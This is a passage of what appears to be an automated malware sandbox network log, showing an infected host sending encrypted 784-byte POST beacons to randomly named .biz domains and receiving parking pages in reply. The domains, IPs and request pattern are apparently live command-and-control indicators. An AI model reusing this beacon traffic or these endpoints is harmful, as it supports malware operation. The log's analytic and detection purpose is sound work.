                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655858994 CET784OUTData Raw: c6 0d b7 a9 b1 ed 6d c1 04 03 00 00 e8 ec bb 33 72 ac 5d 15 ea ae 39 f7 98 a1 56 df 84 4e 66 7a 33 22 05 a6 44 0a a2 04 48 f6 33 3c fe c2 eb 61 f6 4e 64 20 9e 9f 7b 3a b8 44 4f 79 8b f4 0f e0 6b f7 e6 00 bd 0c df 06 4b 27 bd d1 11 70 36 b0 3c df
                                                                                                                                                                                                                                                                        Data Ascii: m3r]9VNfz3"DH3<aNd {:DOykK'p6<)tqQK+e;'`A4P{s{av5R0qOA)~zXw^/'BI?lT +_ukl(gB{KkS&dY<'5Hb
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372157097 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=f80205e469d29e5b4247281c6ff83e93|8.46.123.189|1736942264|1736942264|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        12192.168.2.224917618.141.10.10780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424696922 CET353OUTPOST /xatwldmnpl HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424719095 CET784OUTData Raw: b9 1a 9d 92 e9 2f ad b7 04 03 00 00 6e 09 fd 9a 39 be 15 b1 8a 52 fa 69 6f 51 9c e4 9e 4d 74 aa 1f 4d 7b 0d 61 45 da 2d 2b 1c a5 e0 ba 59 f1 91 bf 5c 8a cf 59 fa dd 3c 52 cf 14 69 4b 7b f1 9d c2 bf 24 9e 8c 60 8d f9 f9 83 93 e3 24 9c e4 40 dc 68
                                                                                                                                                                                                                                                                        Data Ascii: /n9RioQMtM{aE-+Y\Y<RiK{$`$@h;^>@/ H;r<2f{Qg.9pfs+0@+iMqm5,g-@[$f_3mR81eo]]SL.Qmr/zE3jyOcxS&F#~
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.800672054 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=7e2efebbcbe070ebf9c8e97d6f33b7ee|8.46.123.189|1736942265|1736942265|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        13192.168.2.224917754.244.188.17780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.959305048 CET352OUTPOST /agmftfyaknf HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.959330082 CET784OUTData Raw: 3a a3 2b 79 51 31 46 1b 04 03 00 00 88 c4 ac 32 b9 c4 91 93 ee b8 96 0f 98 60 5c 6d 8f 10 7f a7 90 51 57 7f c7 a6 e1 f7 77 5c 6e 39 9a 1f b2 9c d1 52 65 8e ad 00 c3 4c d3 cf 9a e4 0b ad dd a3 f6 a5 83 d0 8f 06 a4 10 66 ee 31 09 e8 c2 96 e3 41 73
                                                                                                                                                                                                                                                                        Data Ascii: :+yQ1F2`\mQWw\n9ReLf1AsNt%{[oj2Ha#Ru.1b-u'yjhCpi~1X@xN|O3Ww@D#o$g2t2N|uCJ{0R#/fbbQMg
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.694590092 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=0b4f63d1da6a6050d828f076b1237354|8.46.123.189|1736942266|1736942266|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        14192.168.2.224917844.221.84.10580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.851247072 CET346OUTPOST /jy HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.851248026 CET784OUTData Raw: 61 77 93 56 33 de 0d 1c 04 03 00 00 13 75 b3 f2 d1 80 3f 8b 82 f2 79 10 3f dd c4 6c d2 39 5a d2 a9 f3 f1 57 c8 4e e5 c3 d3 83 89 e8 3e 88 14 91 ac 99 e8 09 cf dd 16 40 a6 91 6a d1 59 a7 ef f1 3c 51 14 26 4f 27 b1 85 69 3e 04 87 1d 71 23 d3 49 f0
                                                                                                                                                                                                                                                                        Data Ascii: awV3u?y?l9ZWN>@jY<Q&O'i>q#Izt/sbYEC 0|U<IP&KBb@V|9x0{Ko;gR)Yh`z2t&A,/BS&[hlvbf(fzjmy\>u(,m.NGr&
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.233333111 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:47 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=49872289106ae292f0fc25bcb1e912e2|8.46.123.189|1736942267|1736942267|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        15192.168.2.224917972.52.178.2380
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.266736031 CET347OUTPOST /vpav HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.266763926 CET784OUTData Raw: f3 3c 44 f5 38 58 6d 42 04 03 00 00 60 0e 4e 47 d3 ba a3 dc 95 97 e4 cc 58 87 99 dc 46 6a 4f 93 a3 16 02 2b 41 0e 0a dc 0d 5f 8e e6 85 b4 7f af 5b 56 ab 87 91 1c 47 80 e2 7a bd 73 ec a7 79 e6 30 40 fc 0d 1a 63 2c 5b d9 25 69 e7 92 ba 08 db 49 ec
                                                                                                                                                                                                                                                                        Data Ascii: <D8XmB`NGXFjO+A_[VGzsy0@c,[%iIfXY&~OU`e2jH`}vXL)CoCK,pLc6q"q=fSMR,3>lan!2(g@L_RE0 c"yO1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.783277988 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:47 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/vpav?usid=20&utid=14164923657
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.995803118 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:47 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/vpav?usid=20&utid=14164923657
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.903795004 CET356OUTPOST /wqgsdflawiqut HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.903795004 CET784OUTData Raw: 0c 38 cc f2 4e 82 f9 8f 04 03 00 00 86 dc e0 3c 02 e6 f0 34 60 d2 6d b3 61 1a db 60 f8 4f d6 1f c2 15 5e 35 d9 65 25 22 03 f2 32 1c 00 c8 e0 86 f7 49 50 fc 1d e7 ef f0 e7 7e d1 8d 2c 3f 69 0e ce bc 61 4e 5d cc 42 5a 79 02 b6 99 79 03 4d 2a 1d ea
                                                                                                                                                                                                                                                                        Data Ascii: 8N<4`ma`O^5e%"2IP~,?iaN]BZyyM*-G$*<npyC\Zl`L1y<.kk'QBzP:)R[?OQ?}!oz1h,J$Aq/#%LtG[)e$wA;3YSi
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.046168089 CET288INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/wqgsdflawiqut?usid=20&utid=14164923942
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.255733013 CET288INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/wqgsdflawiqut?usid=20&utid=14164923942
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        16192.168.2.2249180199.59.243.22880
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.259345055 CET354OUTGET /vpav?usid=20&utid=14164923657 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww7.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.717209101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        date: Wed, 15 Jan 2025 11:57:48 GMT
                                                                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        content-length: 1134
                                                                                                                                                                                                                                                                        x-request-id: 76027ce3-459b-4d12-ba82-99b7f21f2f8e
                                                                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MqBZY77877j634G/zf0nKVP0OzjJrMVE0gKVuBaJIK2rIE2bKAxDgkmJEMmUvv0km7esl2/Yxzal5UUujBIhYg==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=76027ce3-459b-4d12-ba82-99b7f21f2f8e; expires=Wed, 15 Jan 2025 12:12:48 GMT; path=/
                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 71 42 5a 59 37 37 38 37 37 6a 36 33 34 47 2f 7a 66 30 6e 4b 56 50 30 4f 7a 6a 4a 72 4d 56 45 30 67 4b 56 75 42 61 4a 49 4b 32 72 49 45 32 62 4b 41 78 44 67 6b 6d 4a 45 4d 6d 55 76 76 30 6b 6d 37 65 73 6c 32 2f 59 78 7a 61 6c 35 55 55 75 6a 42 49 68 59 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MqBZY77877j634G/zf0nKVP0OzjJrMVE0gKVuBaJIK2rIE2bKAxDgkmJEMmUvv0km7esl2/Yxzal5UUujBIhYg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.717262983 CET568INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzYwMjdjZTMtNDU5Yi00ZDEyLWJhODItOTliN2YyMWYyZjhlIiwicGFnZV90aW1lIjoxNzM2OTQyMjY4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        17192.168.2.224918176.223.26.9680
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.307516098 CET364OUTGET /wqgsdflawiqut?usid=20&utid=14164923942 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww12.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946491957 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:49 GMT
                                                                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Hy8nl8eWLFtKzFuv+A68mMfb4xO+wkAY5oW7wu9kHg/MVmcDfDZXu0RunlCNQdOeb9zZyygl0fdcr2eX+AyWAw==
                                                                                                                                                                                                                                                                        X-Domain: przvgke.biz
                                                                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946557045 CET1236INData Raw: 33 64 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                                                                        Data Ascii: 3dd2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Hy8nl8eWLFtKzFuv+A68mMfb4xO+wkAY5oW7wu9kHg/MVmcDfDZXu0RunlCNQdOeb9zZy
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946594000 CET224INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                                                                                                                        Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946624041 CET1236INData Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22
                                                                                                                                                                                                                                                                        Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946656942 CET1236INData Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d
                                                                                                                                                                                                                                                                        Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946691036 CET1236INData Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73
                                                                                                                                                                                                                                                                        Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNM
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946722984 CET1236INData Raw: 79 72 69 67 68 74 2e 20 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 6f 6e 43 6c 69 63 6b 3d 22 77 69
                                                                                                                                                                                                                                                                        Data Ascii: yright. All Rights Reserved.<br/><br/><a href="javascript:void(0);" onClick="window.open('/privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Priva
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.946755886 CET612INData Raw: 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 27 3a 20 27 23 30 62 33 32 37 39 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 78 74 27 3a 20 27 23 66 66 66 27 0a 20 20 20 20 7d 3b 0a 20 20
                                                                                                                                                                                                                                                                        Data Ascii: 'colorSearchButton': '#0b3279', 'colorSearchButtonText': '#fff' }; </script><script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczNjk0MjI2OS43OTcyOmM2ZjhkODRhMmMxYj
